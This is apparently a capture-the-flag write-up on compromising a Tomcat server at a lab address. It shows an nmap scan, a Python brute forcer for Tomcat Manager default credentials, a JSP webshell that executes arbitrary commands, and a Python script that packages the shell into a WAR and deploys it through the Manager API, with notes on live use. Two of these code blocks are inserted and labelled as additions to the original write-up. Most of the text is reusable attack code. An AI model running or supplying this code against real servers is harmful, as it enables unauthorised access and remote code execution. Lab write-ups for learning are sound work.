Basic information

Port scan

Only one open port, 8080:

$ nmap -sC -sV -Pn 10.10.10.95
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-05 14:01 CST
Nmap scan report for 10.10.10.95
Host is up (0.073s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.58 seconds

8080

Tomcat; the Manager application requires a password:

Tomcat brute force

Wordlist: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt

It is HTTP 401 Basic authentication, so just load the wordlist into Burp Intruder with a Base64-encode payload-processing rule on the Authorization header; remember to untick automatic URL encoding, otherwise the `=` padding in the Base64 value is encoded and every attempt fails:

Credentials obtained:

tomcat:s3cret
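As an added example (not code from the original writeup), the same Basic-auth brute force done from Python instead of Burp: it parses the `user:password` lines of the SecLists wordlist, builds the `Authorization` header exactly as Burp's Base64 rule would, and stops at the first 200. The wordlist content, the Manager URL and the simulated Tomcat responder (`fake_tomcat_opener`) are constructed assumptions so the script runs offline; pass `urllib.request.urlopen` as the opener for a live target.

```python
import base64
import urllib.error
import urllib.request

# Constructed sample in the format of SecLists' tomcat-betterdefaultpasslist.txt (user:password per line)
SAMPLE_WORDLIST = """\
admin:admin
tomcat:tomcat
tomcat:s3cret
"""

# Assumed target: the Tomcat Manager on the host from the nmap scan
MANAGER_URL = "http://10.10.10.95:8080/manager/html"


def parse_wordlist(text):
    """Turn 'user:password' lines into (user, password) tuples, skipping blanks and comments."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, password = line.partition(":")
        if sep:
            pairs.append((user, password))
    return pairs


def basic_auth_header(user, password):
    """What Burp's Base64 payload-processing rule produces: 'Basic ' + b64(user:password).
    The '=' padding is why URL encoding must be disabled in Intruder."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def try_login(url, user, password, opener=urllib.request.urlopen):
    """Return the HTTP status for one pair: 401 = wrong, 403 = valid but lacking a manager role, 200 = in."""
    req = urllib.request.Request(url, headers={"Authorization": basic_auth_header(user, password)})
    try:
        with opener(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def brute_force(url, pairs, opener=urllib.request.urlopen):
    """Try every pair in order; return the first one that gets a 200, or None."""
    for user, password in pairs:
        if try_login(url, user, password, opener) == 200:
            return user, password
    return None


# --- Constructed stand-in for the Tomcat Manager so the example runs offline ---
class _FakeResponse:
    def __init__(self, status):
        self.status = status

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False


def fake_tomcat_opener(valid=("tomcat", "s3cret")):
    """Simulates Tomcat's Basic-auth realm: 200 for the one valid pair, 401 for anything else."""
    expected = basic_auth_header(*valid)

    def opener(req):
        if req.get_header("Authorization") == expected:
            return _FakeResponse(200)
        raise urllib.error.HTTPError(req.full_url, 401, "Unauthorized", {}, None)

    return opener


if __name__ == "__main__":
    found = brute_force(MANAGER_URL, parse_wordlist(SAMPLE_WORDLIST), fake_tomcat_opener())
    print("credentials:", found)  # use urllib.request.urlopen as the opener against a real target
```

A 403 instead of a 401 is worth noticing: it means the password is right but the account lacks the role for that interface (`manager-gui` for `/manager/html`, `manager-script` for `/manager/text`), so a different Manager path may still be usable.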

webshell

Once logged in, upload a WAR package through the Manager's deploy form to get a webshell:

It is already running with SYSTEM privileges:

shell.jsp

<%
// Minimal JSP webshell: when pwd=b, run the "i" query parameter through Runtime.exec,
// e.g. /shell.jsp?pwd=b&i=whoami
if ("b".equals(request.getParameter("pwd"))) {
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    // Convert only the bytes actually read; new String(b) would also dump stale buffer contents
    while ((a = in.read(b)) != -1) {
        out.println(new String(b, 0, a));
    }
    out.print("</pre>");
}
%>
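As an added example (not code from the original writeup), packaging the shell.jsp above into a WAR and deploying it without the browser. The WAR is built in memory, and the deploy goes through the Manager text interface with `PUT /manager/text/deploy`, which needs the `manager-script` role; if the account only has `manager-gui` (as when the deploy form was used above), the HTML upload form is the way in instead. The base URL, context path and JSP filename are assumptions.

```python
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Assumed target, context path and filename
BASE_URL = "http://10.10.10.95:8080"
CONTEXT_PATH = "/backup"
JSP_NAME = "shell.jsp"

# Minimal deployment descriptor (Tomcat 7 accepts a WAR without one, but it keeps the archive well-formed)
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"></web-app>
"""

# The JSP from the writeup, embedded as data so the WAR is self-contained
JSP_SHELL = r"""<%
if ("b".equals(request.getParameter("pwd"))) {
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while ((a = in.read(b)) != -1) {
        out.println(new String(b, 0, a));
    }
    out.print("</pre>");
}
%>
"""


def build_war(jsp_name, jsp_source):
    """Build an in-memory WAR: WEB-INF/web.xml plus the JSP at the webapp root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the files inside a WAR, to sanity-check what is about to be uploaded."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def basic_auth_header(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_war(base_url, user, password, context_path, war_bytes, opener=urllib.request.urlopen):
    """PUT the WAR to the Manager text interface (requires the manager-script role)."""
    url = f"{base_url}/manager/text/deploy?" + urllib.parse.urlencode({"path": context_path, "update": "true"})
    req = urllib.request.Request(
        url,
        data=war_bytes,
        method="PUT",
        headers={
            "Authorization": basic_auth_header(user, password),
            "Content-Type": "application/octet-stream",
        },
    )
    with opener(req) as resp:
        return resp.read().decode()  # Tomcat answers "OK - Deployed application at context path ..." on success


def shell_url(base_url, context_path, jsp_name, pwd, command):
    """URL that runs `command` through the deployed JSP; the query is URL-encoded so spaces and '&' are safe."""
    return f"{base_url}{context_path}/{jsp_name}?" + urllib.parse.urlencode({"pwd": pwd, "i": command})


if __name__ == "__main__":
    war = build_war(JSP_NAME, JSP_SHELL)
    print(war_entries(war))
    print(shell_url(BASE_URL, CONTEXT_PATH, JSP_NAME, "b", "whoami"))
    # Live use, once credentials with manager-script are known:
    # print(deploy_war(BASE_URL, "tomcat", "s3cret", CONTEXT_PATH, war))
```

Once deployed, the context path is `/backup`, so the shell answers at `/backup/shell.jsp`; `shell_url` takes care of encoding commands such as `cmd /c dir` that would otherwise break the query string.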

reverse shell

Convert it into a reverse shell for convenient interactive use:

flags

Here both flags are in the same file:

References